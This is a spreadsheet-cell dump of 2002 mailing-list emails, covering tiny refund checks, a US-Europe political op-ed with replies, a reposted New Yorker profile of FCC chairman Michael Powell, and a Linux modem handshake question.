BM&gt; non-volatile disk images. It would be analogous to performing nightly
BM&gt; ghosting operations, only it would be more efficient and involve less (or
BM&gt; no) downtime.BM&gt; Thanks for any opinions,
BM&gt; Ben
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Oct 08, 2002 at 11:51:54AM -0700, Elias wrote:
&gt; So, given the apparent commonality of these occurances, companies appear 
&gt; to be losing a large amount of money by mailing these tiny checks out. 
&gt; Why can't they simply credit the account in question on the next bill? 
&gt; Granted, if an account has been closed there is no such option...I've been waiting for Hettinga to regale us with one of his well-tuned
micro-cash-bearer-settlement-geodesic-finance rants. Bob, you are SO 
disappointing me.-- 
njl
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1At 3:25 PM -0400 on 10/8/02, Ned Jackson Lovely wrote:
&gt; I've been waiting for Hettinga to regale us with one of his
&gt; well-tuned micro-cash-bearer-settlement-geodesic-finance rants.
&gt; Bob, you are SO  disappointing me.How about if I include it by reference...:-).Blue in the face,
RAH-----BEGIN PGP SIGNATURE-----
Version: PGP 7.5iQA/AwUBPaMxL8PxH8jf3ohaEQJOvwCgwLjDfcRLc/15ohgtx/Y7Vvrl/5IAn0iA
eEFqCWCvykjwv+8jPA/PpDsf
=vNcJ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</si>
  <si>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http://reuters.com/news_article.jhtml?type=entertainmentnews&amp;StoryID=1543345Working this loose knit fashion is what keeps the Mekons so exciting, 
Langford said. "When the Mekons was our whole day job, it became a 
drudgery," he said. " Sometimes we get bogged down and trapped. But we're 
usually pretty greasy enough to bite our leg off, squirm free and run 
off."</t>
  </si>
  <si>
    <t xml:space="preserve">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disciplines?The proceedings of this conference are now available online, at:
http://www.cs.ncl.ac.uk/old/people/brian.randell/home.formal/NATO/index.htmlAlso, don't miss the pictures of attendees, including many significant
contributors to the field of Software Engineering:
http://www.cs.ncl.ac.uk/old/people/brian.randell/home.formal/NATO/N1968/inde
x.html- Jim
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.techcentralstation.com/1051/printer.jsp?CID=1051-100802BThe Disappearing Alliance
By Dale Franks 10/08/2002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communism.Tragically, a generation from now, we may be bitter adversaries.Europe has increasingly fallen under the spell of a political ideology that
Hudson Institute scholar John Fonte has termed "progressive
transnationalism". The key doctrines of this form of post-communist
progressivism contain some fairly pernicious ideas. Among these are the
deconstruction of nationalism, the promotion of post-nationalist ideas of
citizenship (i.e. a "global" citizenry), a redefinition of democracy, and
the pooling of national sovereignty into multinational groups such as the
United Nations.The European Union, itself a multinational organization built through the
pooling of sovereignty by European nations, is post-democratic. While there
is a European Parliament, the EU's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EU's political elite. Both the EC and the European Court of Justice
regularly overturn the national laws of democratically elected EU member
governments. This is a step backward in Europe's political development.European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resent?and fear
- the fact that we have the ability to project American power anywhere
in the world.On August 9, 2002, Adrian Hamilton wrote a column in the UK's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fantastic.At least, for now.Despite the tongue-in-cheek nature of this editorial, however, the fact
remains that America is increasingly viewed this way by the European
intellectual and political elite.The Europeans actively desire a world where the United Nations keeps in
check the activities of sovereign states. Because they have built such a
system in Europe, they feel it's valid for the rest of the world. America,
however, is the biggest obstacle to such a system. The Europeans cannot
understand why America places a higher value on the ethos of national
sovereignty and limited, consensual, and constitutional government, than it
does on compliance with international "norms." They view all departures
from such norms as aberrant. Because the UN member states all have an equal
vote in prescribing international norms, they assume that, since the
process is ostensibly legitimate, the results must be as well. The trouble
with this idea, of course, is that it gives the views of non-democratic,
authoritarian states the same weight as those of free, democratic
societies. It sanctifies the process, with no regard to the actual results.Thus, they are unable to make any moral distinction between the US refusals
to join in a given international effort because we wish to preserve the
liberty of our citizens, and similar refusals from Iraq because its
dictator wishes to maintain his firm grip on power. Our repeated references
to the US Constitution, and our unwillingness to bypass its provisions to
comply with international norms, are incomprehensible to them. They assume,
therefore, that our refusal is based on arrogance, rather than on a
commitment to
constitutional rights.None of this bodes well for the future of Euro-American friendship, or
cooperation. If the Europeans continue to reject traditional liberalism in
favor of the new progressivism, their criticism of the US will rise, while
their tolerance of our differences will fall. Obviously, in such a
political atmosphere, the opportunities for conflict will inevitably
increase.That thought is frightening enough. Even more frightening, however, is the
thought that such a conflict might be averted by our own acceptance of the
new ideology of transnational progressivism.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</si>
  <si>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OK, lets break this down into the Kevin Smith worldview taht equate
everything with Star Wars...EU is the Republic/empire and we  are..what,..the Trade  Federation?
Stretch this out and it could be seen that the UN is the Jedi,  complete
with faling powers.Work with me folks...</t>
  </si>
  <si>
    <t xml:space="preserve">So, given the apparent commonality of these occurances, companies appear 
to be losing a large amount of money by mailing these tiny checks out. 
Why can't they simply credit the account in question on the next bill? 
Granted, if an account has been closed there is no such option...Elias
Christopher Haun wrote:&gt; eheh i'll do yah one better i have a check some place (i just moved or i'd 
&gt; go scan it in) for $0.01 from Time Warner Cable. </t>
  </si>
  <si>
    <t xml:space="preserve">
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of R.
A.
&gt; Hettinga
&gt; Subject: The Disappearing Alliance
&gt; 
&gt; http://www.techcentralstation.com/1051/printer.jsp?CID=1051-100802B
&gt; 
&gt; 
&gt; 
&gt; The Disappearing Alliance
&gt; By Dale Franks 10/08/2002&gt; Obviously, in such a
&gt; political atmosphere, the opportunities for conflict will inevitably
&gt; increase.Given current trends, particularly in demographics, such conflict won't
be military.  Europe wouldn't stand a chance now and things are getting
worse in a hurry.  They are SOL.Not to mention that when push comes to shove they wouldn't stand united.&gt; 
&gt; That thought is frightening enough. Even more frightening, however, is
the
&gt; thought that such a conflict might be averted by our own acceptance of
the
&gt; new ideology of transnational progressivism.Now that is a scary thought.
]</t>
  </si>
  <si>
    <t xml:space="preserve">I can't believe I actually read a laugh-out-loud funny profile of the 
*FCC Commissioner* fer crissakes! So the following article comes 
recommended, a fine explanation of Michael Powell's extraordinary 
equivocation.On the other hand, I can also agree with Werbach's Werblog entry... Rohit&gt; A Trip to F.C.C. World
&gt;
&gt; Nicholas Lemann has a piece in the New Yorker this week about FCC 
&gt; Chairman Michael Powell.Â  It's one of the first articles I've seen that 
&gt; captures some of Powell's real personality, and the way he's viewed in 
&gt; Washington.Â  Unfortunately, Lemann ends by endorsing conventional 
&gt; political wisdom.Â  After describing how Powell isn't really a 
&gt; fire-breathing ideological conservative, he concludes that, in essence, 
&gt; Powell favors the inumbent local Bell telephone companies, while a 
&gt; Democratic FCC would favor new entrants.Â  I know that's not how Powell 
&gt; sees the world, and though I disagree with him on many issues, I think 
&gt; he's right to resist the old dichotomy.
&gt;
&gt; The telecom collapse should be a humbling experience for anyone who 
&gt; went through it.Â  The disaster wasn't the regulators' fault, as some 
&gt; conservatives argue.Â  But something clearly went horribly wrong, and 
&gt; policy-makers should learn from that experience.Â  Contrary to Lemann's 
&gt; speculation, the upstart carriers won't be successful in a Gore 
&gt; administration, because it's too late.Â  Virtually all of them are dead, 
&gt; and Wall Street has turned off the capital tap for the foreseeable 
&gt; future.Â  Some may survive, but as small players rather than 
&gt; world-dominators.Â 
&gt;
&gt; The battle between CLECs and RBOCs that Lemann so astutely parodies is 
&gt; old news.Â  The next important battle in telecom will be between those 
&gt; who want to stay within the traditional boxes, and those who use 
&gt; different models entirely.Â  That's why open broadband networks and open 
&gt; spectrum are so important.Â  Whatever the regulatory environment, there 
&gt; is going to be consolidation in telecom.Â  Those left out in that 
&gt; consolidation will face increasing pressure to create new pipes into 
&gt; the home, or slowly die. The victors in the consolidation game will cut 
&gt; back on innovation and raise prices, which will create further pressure 
&gt; for alternatives.Â 
&gt;
&gt; Lemann is right that policy-making looks much drier and more ambiguous 
&gt; on the ground than through the lens of history.Â  But he's wrong in 
&gt; thinking that telecom's future will be something like its past.
&gt;
&gt; Friday, October 04, 2002
&gt; 11:17:11 AM Â commentsÂ {0}Â ==============================================================
http://www.newyorker.com/printable/?fact/021007fa_factTHE CHAIRMAN	
by NICHOLAS LEMANN
He's the other Powell, and no one is sure what he's up to.
New Yorker, October 8, 2002Last year, my middle son, in eighth grade and encountering his first 
fairly serious American-history course, indignantly reported that the 
whole subject was incomprehensible. I was shocked. What about Gettysburg 
and the Declaration of Independence and the Selma-to-Montgomery march? 
Just look at my textbook, he said, and when I did I saw his point. His 
class had got up to the eighteen-forties. What I expected was a big 
beefing up of the roles of Sacagawea and Crispus Attucks, and, in-deed, 
there was some of that. But the main difference between my son's text 
and that of my own childhood was that somebody had made the disastrous 
decision to devote most of it to what had actually happened in American 
history. There were pages and pages on tariffs and bank charters and 
reciprocal trade agreements. I skipped ahead, past the Civil War, hoping 
for easier going, only to encounter currency floats and the regulation 
of freight rates. Only a few decades into the twentieth century did it 
become possible to see the federal government's main function as 
responding to dramatic crises and launching crusades for social justice, 
instead of attempting to referee competing claims from economic 
interests.Even now, if one were to reveal what really goes on behind the pretty 
speeches and the sanctimonious hearings in Washington, what you'd find 
is thousands of lawyers and lobbyists madly vying for advantage, not so 
much over the public as over each other: agribusiness versus real 
estate, banks versus insurance companies, and so on. The arena in which 
this competition mainly takes place is regulatory agencies and 
commissions and the congressional committees that supervise them. It's 
an insider's game, less because the players are secretive than because 
the public and the pressâ€”encouraged by the players, who speak in jargonâ€”
can't get themselves interested.One corner of Washington might be called F.C.C. World, for the Federal 
Communications Commission. F.C.C. World has perhaps five thousand 
denizens. They work at the commission itself, at the House and Senate 
commerce committees, and at the Washington offices of the companies that 
the commission regulates. They read Communications Daily (subscription 
price: $3,695 a year), and every year around Christmastime they 
grumblingly attend the Chairman's Dinner, at a Washington hotel, where 
the high point of the evening is a scripted, supposedly self-deprecating 
comedy routine by the commission's chairman.Of all the federal agencies and commissions, the F.C.C. is the one that 
Americans ought to be most interested in; after all, it is involved with 
a business sector that accounts for about fifteen per cent of the 
American economy, as well as important aspects of daily lifeâ€”telephone 
and television and radio and newspapers and the Internet. And right now 
F.C.C. World is in, if not a crisis, at least a very soapy lather, 
because a good portion of what the angry public thinks of as the 
"corporate scandals" concerns the economic collapse of companies 
regulated by the F.C.C. Qwest, WorldCom, Adelphia, and Global Crossing, 
among others, are (or were) part of F.C.C. World. AOL Time Warner is 
part of F.C.C. World. Jack Grubman, the former Salomon Smith Barney 
analyst who seems to have succeeded Kenneth Lay, of Enron, as the 
embodiment of the corporate scandals, is part of F.C.C. World. In the 
past two years, companies belonging to F.C.C. World have lost trillions 
of dollars in stock-market valuation, and have collectively served as a 
dead weight pulling down the entire stock market.This year, an alarmed and acerbic anonymous memorandum about the state 
of the F.C.C. has been circulating widely within F.C.C. World. It evokes 
F.C.C. World's feverish mood ("The F.C.C. is fiddling while Rome burns") 
and suggests why nobody besides residents of F.C.C. World has thought of 
the commission in connection with the corporate scandals. The sentence I 
just quoted is followed by this explanation: "The ILECs appear likely to 
enter all l.d. markets within twelve months, while losing virtually no 
residential customers to attackers since 1996, and suffering about 10% 
market share loss in business lines to CLECs." It's a lot easier to 
think about evil C.E.O.s than to decipher that.
Even in good times, F.C.C. World pays obsessive attention to the 
commission's chairman. In bad times, the attention becomes especially 
intense; and when the chairman is a celebrity F.C.C. World devotes 
itself to full-time chairman-watching. The current chairman, Michael 
Powell, is a celebrity, at least by government-official standards, 
because he is the only son of Colin Powell, the Secretary of State. 
Unlike his father, he has a kind of mesmerizing ambiguity, which 
generates enormous, and at times apoplectically toned, speculation about 
who he really is and what he's really up to. Powell is young to be the 
head of a federal agencyâ€”he is thirty-nineâ€”and genially charming. 
Everybody likes him. Before becoming chairman, he was for three years 
one of the F.C.C.'s five commissioners; not only is he fluent in the 
F.C.C.'s incomprehensible patois, he has a Clintonesque love of the 
arcane details of communications policy. He's always saying that he's an 
"avid moderate." And yet he has a rage-inciting quality. One of his 
predecessors as chairman, Reed Hundt, quoted in Forbes, compared Powell 
to Herbert Hoover. Mark Cooper, of the Consumer Federation of America, 
calls him "radical and extreme." Just as often as he's accused of being 
a right-wing ideologue, Powell gets accused of being paralytically 
cautious. "It ain't about singing 'Kum-Ba-Yah' around the campfire," 
another former chairman, William Kennard, says. "You have to have an 
answer." One day last spring, Powell, testifying before a Senate 
subcommittee, delivered an anodyne opening statement, and the 
subcommittee's chairman, Ernest Hollings, of South Carolina, berated 
him. "You don't care about these regulations," Hollings said. "You don't 
care about the law or what Congress sets down. . . . That's the 
fundamental. That's the misgiving I have of your administration over 
there. It just is amazing to me. You just pell-mell down the road and 
seem to not care at all. I think you'd be a wonderful executive 
vice-president of a chamber of commerce, but not a chairman of a 
regulatory commission at the government level. Are you happy in your 
job?""Extremely," Powell said, with an amiable smile.
One cannot understand Powell's maddening effect, at least on Democrats 
and liberal activists, without understanding not just the stated purpose 
of the commission he chairs but also its real purpose. The F.C.C. was 
created by Congress in 1934, but it existed in prototype well before the 
New Deal, because it performs a function that is one of the classic easy 
cases for government intervention in the private economy: making sure 
that broadcasters stick to their assigned spots on the airwaves. Its 
other original function was preventing American Telephone &amp; Telegraph, 
the national monopoly phone company, from treating its customers 
unfairly. Over the decades, as F.C.C. World grew up into a comfortable, 
well-established place, the F.C.C. segued into the role of industrial 
supervisionâ€”its real purpose. It was supposed to manage the competition 
among communications companies so that it didn't become too bloody, by 
artfully deciding who would be allowed to enter what line of business. 
In addition to looking out for the public's interest, the commission 
more specifically protected the interests of members of Congress, many 
of whom regard the media companies in their districts as the single most 
terrifying category of interest groupâ€”you can cross the local bank 
president and live to tell the tale, but not the local broadcaster. 
According to an oft-told F.C.C. World anecdote, President Clinton once 
blocked an attempt to allow television stations to buy daily newspapers 
in the same city because, he said, if the so-and-so who owned the 
anti-Clinton Little Rock Democrat-Gazette had owned the leading TV 
station in Little Rock, too, Clinton would never have become President.
F.C.C. World may have been con tentious, but it was settled, too, 
because all the reasonably powerful players had created secure economic 
niches for themselves. Then, in the nineteen-eighties, the successful 
breakup of A.T. &amp; T.â€”by far the biggest and most important company the 
commission regulatedâ€”deposited a thick additional sediment of 
self-confidence onto the consciousness of F.C.C. World. A generation 
ago, for most Americans, there was one local phone company, one 
long-distance company, and one company that manufactured telephones, 
which customers were not permitted to ownâ€”and they were all the same 
company. It was illegal to plug any device into a phone line. By the 
mid-nineteen-nineties, there were a dozen economically viable local 
phone companies, a handful of national long-distance companies competing 
to offer customers the lowest price and best service, and stores 
everywhere selling telephone equipment from many manufacturersâ€”and 
millions of Americans had a fax machine and a modem operating over the 
telephone lines. A.T. &amp; T. had argued for years that it was a "natural 
monopoly," requiring protection from economic competition and total 
control over its lines. So much for that argument. Over the same period, 
the F.C.C. had assisted in the birth of cable television and cell phones 
and the Internet. It was the dream of federal-agency success come true: 
consumers vastly better served, and the industry much bigger and more 
prosperous, too.The next big step was supposed to be the Telecommunications Act of 1996, 
one of those massive, endlessly lobbied-over pieces of legislation which 
most people outside F.C.C. World probably felt it was safe to ignore. 
Although the Telecom Act sailed under the rhetorical banner of 
modernization and deregulation, its essence was a grand interest-group 
bargain, in which the local phone companies, known to headline writers 
as "baby Bells" and to F.C.C. World as "arbocks" (the pronounced version 
of RBOCs, or regional Bell operating companies), would be permitted to 
offer long-distance service in exchange for letting the long-distance 
companies and smaller new phone companies use their lines to compete for 
customers. Consumers would win, because for the first time they would 
get the benefits of competition in local service while getting even more 
competition than they already had in long distance. But the politics and 
economics of the Telecom Act (which was shepherded through Congress by 
Vice-President Gore) were just as important. Democrats saw the act as 
helping to reposition them as the technology partyâ€”the party that 
brought the Internet into every home, created hundreds of thousands of 
jobs in new companies, and, not least, set off an investment boom whose 
beneficiaries might become the party's new contributor base. Clinton's 
slogans about the "information superhighway" and "building a bridge to 
the twenty-first century," which, like all Clinton slogans, artfully 
sent different messages to different constituencies, were the rhetorical 
correlates of the Telecom Act, and Gore's cruise to the Presidency was 
supposed to be powered substantially by the act's success.The F.C.C. had a crucial role in all this. The arbocks are rich, 
aggressive, politically powerful, and generally Republican (though like 
all important interest groups they work with both parties); they 
immediately filed lawsuits, which wound up tying the hands of their new 
competitors in the local phone market for more than three years. Through 
rule-making, enforcement, and litigation, the F.C.C., then headed by 
Reed Hundt, who was Gore's classmate at St. Albans, was supposed to keep 
the arbocks in their cages, so that not only long-distance companies 
like A.T. &amp; T. and MCI WorldCom but also a whole category of new 
companies, "see-lecks" (the pronounced version of CLECs, or competitive 
local exchange carriers), could emerge. This entailed the regulatory 
equivalent of hand-to-hand combat: the see-leck is supposed to have 
access to the arbock's switching equipment, the arbock won't give the 
seeleck a key to the room where it's kept, so the see-leck asks the 
F.C.C. to rule that the arbock has to give it the key.Partly because Hundt assured the see-lecks and other new companies that 
he would protect them, and partly because of the generally booming 
condition of the economy then, investment capital flooded into the 
see-lecksâ€”companies with names like Winstar, Covad, and Teligentâ€”and 
into other telecommunications companies. Even not obviously related 
technology companies like Cisco Systems benefitted from the telecom 
boom: demand for their products was supposed to come from the see-lecks 
and other new players. There would be no conflict between the interests 
of the new telecom companies and those of consumers; as one of Hundt's 
former lieutenants told me, "Reed used to joke that my job was to make 
sure that all prices went down and all stocks went up."
The years following the passage of the Telecom Act were the peak of the 
boom. Wall Street had its blood up, and that meant not just more 
startups but also more mergers of existing communications companies: 
Time Warner and AOL decided to throw in together, and A.T. &amp; T. and 
Comcast, and so on. (Surely, WorldCom and the other telecom bad guys 
believed that their self-dealing, stock-overselling, and creative 
accounting would go unnoticed because the market was so 
undiscriminating.)By the time the outcome of the 2000 Presidential election had been 
determined, the telecom crash was well under way. Nonetheless, the 
chairmanship of the F.C.C. remained one of the best jobs, in terms of 
influence and visibility, available to a career government regulator. 
Three Republicans emerged as candidates: Powell, who was a commissioner; 
Harold Furchtgott-Roth, the farthest-to-the-right commissioner; and 
Patrick Wood, the head of the Texas Public Utility Commission and, as 
such, a George W. Bush guy. In Texas, however, Wood had crossed the most 
powerful person in the arbock camp, Edward Whitacre, the C.E.O. of 
S.B.C. Communications, which is headquartered in San Antonio. This meant 
that the arbocks didn't want Wood as head of the F.C.C., because he 
might be too pro-see-leck. (Wood is now the head of the Federal Energy 
Regulatory Commission.) Michael Powell had to signal the arbocks that he 
wasn't as threatening as Wood, while also signalling the conservative 
movement that he was only negligibly farther to the left than 
Furchtgott-Roth.Powell did this deftly. For example, in December of 2000 he appeared 
before a conservative group called the Progress &amp; Freedom Foundation and 
gave a very Michael Powell speechâ€”whimsical, intellectual, and 
free-associative (Biblical history, Joseph Schumpeter, Moore's Law)â€”that 
began by making fun of the idea that the F.C.C. should try to keep new 
telecom companies alive. "In the wake of the 1996 Act, the F.C.C. is 
often cast as the Grinch who stole Christmas," Powell said. "Like the 
Whos, down in Who-ville, who feast on Who-pudding and rare Who-roast 
beast, the communications industry was preparing to feast on the 
deregulatory fruits it believed would inevitably sprout from the Act's 
fertile soil. But this feast the F.C.C. Grinch did not like in the 
least, so it is thought." Thus Powell was indicating that if he became 
chairman he didn't expect to administer first aid to the see-lecks as 
part of the job. He was appointed to the chairmanship on the first day 
of the Bush Administration.Twenty months into the Administration, nearly all the see-lecks are dead 
or dying; nearly all long-distance companies, not just WorldCom, are in 
serious trouble; cable companies have lost half their value; satellite 
companies are staggering. The crash has had an automatically 
concentrating effect, because as new companies die the existing 
companies' market share increases, and, if the existing companies are in 
good shape financially, they have the opportunity to pick up damaged 
companies at bargain prices. During the Bush Administration, as the 
financial carnage in communications has worsened, the communications 
industry has moved in the direction of more concentration. If the Bells 
wind up protecting their regional monopolies in local phone service, and 
if they also merge, the country will be on its way to having a national 
duopoly in local service: Verizon, in the East, and S.B.C., in the West. 
And these companies could dominate long distance as well, because of the 
poor health of the long-distance companies.The cable business also seems close to having two dominant national 
companies, AOL Time Warner and Comcast. Unlike the phone companies, they 
don't have to share their wiring with other companies and so can more 
fully control what material they allow to enter people's homes. As part 
of the complicated bargaining with interest groups that led to the 1996 
Telecom Act, the limits on concentration in the radio industry were 
significantly loosened, and in the past six years the number of 
radio-station owners in the United States has been cut by twenty-five 
per cent; today, a large portion of local and national radio news 
programming is supplied by a single company, Westwood One, a subsidiary 
of Viacom.In this situation, many Democrats and liberals think, the F.C.C. should 
be hyperactiveâ€”the superhero of government regulation, springing to the 
rescue of both consumers and the communications industry. It should try 
to breathe life into the see-lecks and other new companies. It should 
disallow mergers, maintain ownership limits, and otherwise restrain the 
forces of concentration. It should use the government's money and muscle 
to get new technologyâ€”especially fast Internet connectionsâ€”into the 
homes of people who can't afford it at current market prices. (An 
analogy that a lot of people in F.C.C. World make is between telecom and 
the Middle East: the Clinton people blame the bloodshed on the Bush 
people, because they disengaged when they came into office, and the Bush 
people blame it on the Clinton people, because they raised too many 
expectations and stirred too many passions.)But Michael Powell's F.C.C. has not been hyperactive. Powell has been 
conducting internal policy reviews and reforming the management of the 
F.C.C. and waiting for the federal courts and the Congress to send him 
signals. (In mid-September, Powell finally initiated a formal review of 
the F.C.C.'s limits on media concentration.) This doesn't mean he has 
been inactive; rather, he has been active in a way that further 
infuriates his criticsâ€”in a manner that smoothly blends the genial and 
the provocative, he muses about whether the fundamental premises of 
F.C.C. World really make sense, while giving the impression that he's 
having the time of his life as chairman. At his first press conference, 
when he was asked what he was going to do about the "digital 
divide"â€”that is, economic inequality in access to the Internetâ€”he said, 
"You know, I think there is a Mercedes divide. I'd like to have one and 
I can't afford one." At the National Cable &amp; Telecommunications 
Association convention, in Chicago, Powell, following a troupe of 
tumblers to the stage, interrupted his walk to the podium to perform a 
somersault.
Not long ago, I went to see Powell in his office at the F.C.C. Until 
1998, when the commission moved to a new building in Southwest 
Washington, near the city's open-air fish market, F.C.C. World was at 
the western edge of downtown, where everybody would encounter everybody 
else at a few familiar restaurants and bars. Today, the F.C.C. building 
looks like the office of a mortgage company in a suburban office park. 
Even the chairman's suite, though large, is beige, carpeted, and 
fluorescent. Powell is a bulky man who wears gold-rimmed glasses and 
walks with a pronounced limp, the result of injuries he suffered in a 
jeep accident in Germany, in 1987, when he was an Army officer. Because 
of the accident, he left the Army and went to law school, where he 
became entranced with conservative ideas about regulation, particularly 
the idea that the government, rather than trying to correct the flaws of 
the market before the factâ€”"prophylactically," as he likes to sayâ€”should 
wait till the flaws manifest themselves and then use antitrust 
litigation to fix them. He worked briefly at a corporate law firm, and 
then became a protÃ©gÃ© of Joel Klein, the head of the antitrust division 
of the Clinton Justice Department and the man who led the government's 
legal case against Microsoft. (He was recently appointed chancellor of 
the New York public-school system.) It testifies to Powell's political 
skill that he is probably the only high official in the Bush 
Administration who not only served in the Clinton Administration but 
also maintains close ties to Bush's nemesis Senator John McCain, of 
Arizona. One of the things about Powell that annoy people is his 
enduring love of law schoolâ€”"It's sort of like a law-school study 
session over there," one Democratic former commissioner said. As if to 
confirm the charge, Powell, when I arrived, introduced me to four law 
students, summer interns at the commission, whom he'd invited to sit in.I began by asking Powell whether he agreed with the founding assumptions 
of the F.C.C. For example, could private companies have apportioned the 
airwaves among themselves without the government being involved?"I think we'll never know," Powell said. "I don't think it's an 
automatically bad idea, the way some people will argue. Land is probably 
the best analogue. We don't seize all the land in the United States and 
say, 'The government will issue licenses to use land.' If my neighbor 
puts a fence one foot onto my property line, there's a whole body of law 
about what I can do about that, including whether I can tear it down. If 
a wireless company was interfering with another wireless company, it's a 
similar proposition. There are scholars who argueâ€”indeed, the famous 
Ronald Coase treatise that won the Nobel Prize was about thisâ€”that 
spectrum policy is lunacy. The market could work this out, in the kinds 
of ways that we're accustomed to."Talking to Powell was fun. Unlike most high government officials, he 
doesn't seem to be invested in appearing dignified or commanding. He 
slumps in his chair and fiddles with his tie and riffs. He speaks in 
ironic air quotes. He's like your libertarian friend in college who 
enjoyed staying up all night asking impertinent rhetorical questions 
about aspects of life that everybody else takes for granted but that he 
sees as sentimental or illogical. After a while, I asked him whether he 
thought his predecessors' excitement about the 1996 Telecommunications 
Act had been excessive."I would start with a caveat," Powell said. "Look, I can't fault those 
judgments in and of themselves, given the time and what people thought. 
They were not the only ones who were hysterical about the opportunities. 
But, frankly, I've always been a little bit critical. First of all, 
anybody who works with the act knows that it doesn't come anywhere close 
to matching the hyperbole that was associated with it, by the President 
on down, about the kinds of things it's going to open up. I mean, I 
don't know what provisions are the information-superhighway provisions, 
or what provisions are so digitally oriented, or some of the things that 
were a big part of the theatre of its introduction. When one starts 
reading the details, one searches, often in vain, for these provisions. 
But, nonetheless, there was a rising dot-com excitement, and an Internet 
excitement, and people thought this was historic legislation, and it 
certainly was."But. We were sucking helium out of balloons, with the kinds of 
expectations that were being bandied around, and this is before the 
economy or the market even gets in trouble. It was a dramatically 
exaggerated expectationâ€”by the leadership of the commission, by 
politicians, by the market itself, by companies themselves. It was a 
gold rush, and led to some very detrimental business decisions, ones 
that government encouraged by its policies, frankly. Everybody wanted to 
see numbers go up on the board."Powell began imitating an imagined true believer in the Telecom Act. " 
'I want to see ten competitors. Twenty competitors! I want to see 
thirty-per-cent market share. Fifty-per-cent market share! I want the 
Bells to bleed! Then we'll know we've succeeded.' " Now Powell returned 
to being Powell. "I think that expectation was astonishingly 
unrealistic, in the short term. They wanted to see it while they're 
there. We were starting to get drunk on the juice we were drinking. And 
the market was getting drunk on the juice we were drinking. There's no 
question, we went too soon too fast. Too many companies took on too much 
debt too fast before the market really had a product, or a business 
model."How could the Telecom Act have been handled better? "We could have 
chosen policies that were less hellbent on a single objective, and were 
slightly more balanced and put more economic discipline in the system," 
Powell said. "Money chased what seemed like government-promised 
opportunity. The problem with that is there's a morning after, and we're 
in it. And the problem is there is no short fix for this problem. This 
debt is going to take years to bring down to a realistic level. In some 
ways, for short-term gain, we paid a price in long-term stability."Powell went on to say that it might have turned out differently if there 
had been a more "reasonable" level of investment. "No, we wouldn't have 
every home in America with competitive choice yetâ€”but we don't anyway. I 
don't think it's the remonopolization of telephone service. I don't buy 
that. The Bells will prosper, but did anybody believe they wouldn't? The 
part of the story that didn't materialize was that people thought so 
would MCI WorldCom and Sprint."Other local phone companies, he added, hadn't materialized as viable 
businesses, either, and they never might. "Everybody's always saying, 
'The regulators did this and this and this.' But, candidly, the story's 
quite the opposite. I think the regulators bent over backward for six 
years to give them a chance. Conditions don't get that good except once 
every thirty years, and it didn't happen. So, whatever the reason, we're 
looking at a WorldCom that's teetering. We're looking at a long-distance 
business that has had a rapid decline in its revenue base. A.T. &amp; T. is 
breaking itself up. Sprint has struggled."Could the F.C.C. have done anything to make the long-distance companies 
stronger? "At the F.C.C.? I think I'll just be blunt. My political 
answer? Yes, there's all kinds of things we can do at the margin to try 
to help. But I can't find thirty billion dollars for WorldCom somewhere. 
I can't mitigate the impacts of an accounting scandal and an S.E.C. 
investigation. Were I king, it would be wonderful, but I don't have 
those kinds of levers. I don't know whether anybody does. At some point, 
companies are expected to run themselves in a way that keeps them from 
dying." Powell couldn't have made it much clearer that he doesn't think 
it's his responsibility to do anything about the telecom crash. He has 
demonstrated his sure political touch by making accommodationist 
gesturesâ€”in August, for example, five months after disbanding the 
F.C.C.'s Accounting Safeguards Division, Powell announced that he was 
appointing a committee to study accounting standards in the 
communications industry. But that shows that Powell is better at riding 
out the storm than, say, Harvey Pitt, his counterpart at the Securities 
and Exchange Commission, and does not mean that he plans to try to shore 
up the telecom industry.I asked Powell if it would bother him if, for most people, only one 
company provided cable television and only one provided local phone 
service. "Yes," he said. "It concerns us that there's one of each of 
those things, but let's not diminish the importance of there being one 
of each of those things. That still is a nice suite of communications 
capabilities, even if they aren't direct analogues of each other." 
Anyway, Powell said, before long the phone companies will be able to 
provide video service over their lines, and the cable companies will 
provide data service over their lines, so there will be more choice. 
"So, yeah, we have this anxiety: we have one of everything. The question 
is, Does it stay that way?"The concentration of ownership and the concentrated control of 
information did not appear to trouble Powell, either. He said that 
people confuse bigness, which brings many benefits, with concentration, 
which distorts markets. "If this were just economics, it's easy. If you 
were to say to me, 'Mike, just worry about economic concentration,' we 
know how to do thatâ€”the econometrics of antitrust. I can tell you when a 
market's too concentrated and prices are going to rise. The problem is 
other dimensions, like political, ideological, sometimes emotional. Take 
the question of, if everybody's controlling what you see, the assumption 
there is that somehow there'll be this viewpoint, a monolithic 
viewpoint, pushed on you by your media and you won't get diversity. I 
think that's a possibility. I don't think it's nearly the possibility 
that's ascribed to it sometimes."Powell explained, "Sometimes when we see very pointed political or 
parochial programming, it gets attacked as unfair. I see some of the 
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.nytimes.com/2002/10/09/technology/09KORE.htmlBroadband's killer application Â— the one activity that dwarfs all others Â—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Jim
</t>
  </si>
  <si>
    <t xml:space="preserve">At 12:05 PM 10/4/28 -0400, Stephen D. Williams wrote:&gt;Date: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thing.[note date: header]Can I borrow your time machine, pretty please?Udhay-- 
((Udhay Shankar N)) ((udhay @ pobox.com)) ((www.digeratus.com))
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi All,Anyone ever try connecting at 1200bps in Linux? I've got a USR 56K
Faxmodem which is meant to connect to another (same) modem and I have to
connect at this speed due to the (NT) port settings on the remote side,
but the modem handshake always fails at this speed.The modem handshake works at slightly higher speeds (4800bps to
~57600bps) but that is no good for tx/rx'ing data to the remote server
as it insists at talking at the speed of treacle/1200bps.Note Minicom fails to handshake at 1200bps, but HyperTerm in Windows
worked first time(!?), any ideas?Baud 1200 7 data bits Even ParityI am doing a ATZ3 to reset the modem then I send this init string:AT&amp;F1E1V1Q0X4Y0S32=232&amp;A1&amp;B0&amp;C1&amp;D2&amp;H0&amp;I0&amp;K1&amp;M4&amp;N0&amp;P0&amp;R1&amp;S0&amp;U0&amp;Y1... which is most of the defaults.USR said to set S15=128 (disables v.42)) 
&amp; set S32=98 (disable v.92 &amp; X2)But the S15=128 just makes the handshake lockup instead of just giving
up.btw this is a bank's system I am connecting to so reconfiguring their
modems may be difficult.Colin.
-- 
Colin Nevin,
Software Engineer,
Merit Solutions Ltd. (Dublin),
5 Goatstown Cross,
Dublin 14.
------------------------------------------
Printed using 100% recycled electrons.-- 
